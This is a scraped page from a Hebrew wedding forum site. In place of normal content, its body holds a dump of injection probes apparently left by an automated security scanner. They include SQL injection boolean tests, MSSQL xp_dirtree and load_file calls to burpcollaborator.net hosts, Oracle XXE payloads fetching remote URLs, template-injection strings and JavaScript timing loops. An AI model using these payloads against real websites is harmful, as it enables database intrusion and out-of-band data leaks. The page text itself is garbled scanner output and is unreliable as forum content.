פורום כלות

18948314' or '5884'='5884    ' (select load_file('\\d2g27pzbng3dadtd7bra8b178yexbl49vcj76yun.burpcollaborator.net\yxc')) '    ');exec master.dbo.xp_dirtree '\t82id55rtw9tgtztdrxqer7neekdh1ap1ipdc40t.burpcollaborator.netgok'--    );exec master.dbo.xp_dirtree '\jby8gv8hwmcjjj2jgh0ghhadh4n3krdf47s2ft3i.burpcollaborator.netlzg'--    ';exec master.dbo.xp_dirtree '\eyg33qvcjhze6epe3cnb4cx84zay7m0ar1fw2nqc.burpcollaborator.netvod'--    ;exec master.dbo.xp_dirtree '\lk9apxhj5ollslblpj9iqjjfq6w5ttmhd712otci.burpcollaborator.netqyy'--    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % tjfzm SYSTEM "http://ra5gf37pvubrir1rfpzogp9lgcmbjzcngbby2mr.burpcollaborator.net/">%tjfzm;]>'),'/l') from dual)||'    f413e%>e5d89'/"<d9fb2    %}db8d9'/"<e3f20    }}f4f93'/"<da3b8    ' (function(){if(typeof a6d0f==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);a6d0f=1;}}()) '    ' and 3524=3524--    ' and 3523=3524--    ' and 3523=3523--    ' and '3524'='3524    ' and '3523'='3524    ' and '3523'='3523    17108913' or 2719=2719--    17108913' or 2718=2719--    17108913' or 2718=2718--    17108913' or '2719'='2719    17108913' or '2718'='2719    17108913' or '2718'='2718    ' (function(){if(typeof b4187==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);b4187=1;}}()) '    ' and 3951=3952--    ' and 3951=3951--    ' and '3951'='3952    ' and '3951'='3951    18871894' or 9238=9239--    18871894' or 9238=9238--    18871894' or '9238'='9239    ' (select load_file('\\8oxxtkl69bp8w8f8t6d5u6n2ut0q0e32u5i05rtg.burpcollaborator.net\eer')) '    18871894' or '9238'='9238    ');exec master.dbo.xp_dirtree '\j4o89v1hpm5jcjvj9htgah3da4g1gpjda6y1ls9h.burpcollaborator.netftc'--    );exec master.dbo.xp_dirtree '\lf4akxcj0oglnl6lkj4iljefl6r3rrufl792wtki.burpcollaborator.net qz'--    ';exec master.dbo.xp_dirtree '\389sdf51t693g3z3d1x0e17xeoklk9nxeo2jpadz.burpcollaborator.netvfp'--    ;exec master.dbo.xp_dirtree '\vzyk47wtky0v7vqv4tos5typ5gbdb1ep5ftag14q.burpcollaborator.netswo'--    ' (function(){if(typeof f09ff==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);f09ff=1;}}()) '    '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % cryaw SYSTEM "http://rsngx3ppdutr0rjrxphoyprlyc494x7lb96wxkm.burpcollaborator.net/">%cryaw;]>'),'/l') from dual)||'    ' and 1024=1025--    ' and 1024=1024--    da000%>d46c1'/"<b118b    %}fdec7'/"<b8adc    ' and '1024'='1025    }}b22a7'/"<f9699    ' and '1024'='1024    13675430' or 8667=8668--    13675430' or 8667=8667--    ' (select load_file('\\7owwtjl59ap7w7f7t5d4u5n1us0rsfm3d611osch.burpcollaborator.net\jxs')) '    13675430' or '8667'='8668   
עוד ביטויים

כל הזכויות שמורות kala4kala.co.il
פיתוח: LotemX בניית אתרים ובניית רשת חברתית | עיצוב: 2pm
נכנסת להריון? מזל טוב! כנסי לאמא4אמא ותמצאי שם הכל החל ממחשבון הריון , פורום הריון , עגלות לתינוק , סלקלים ועוד זמן טעינה: 0.0348 שניות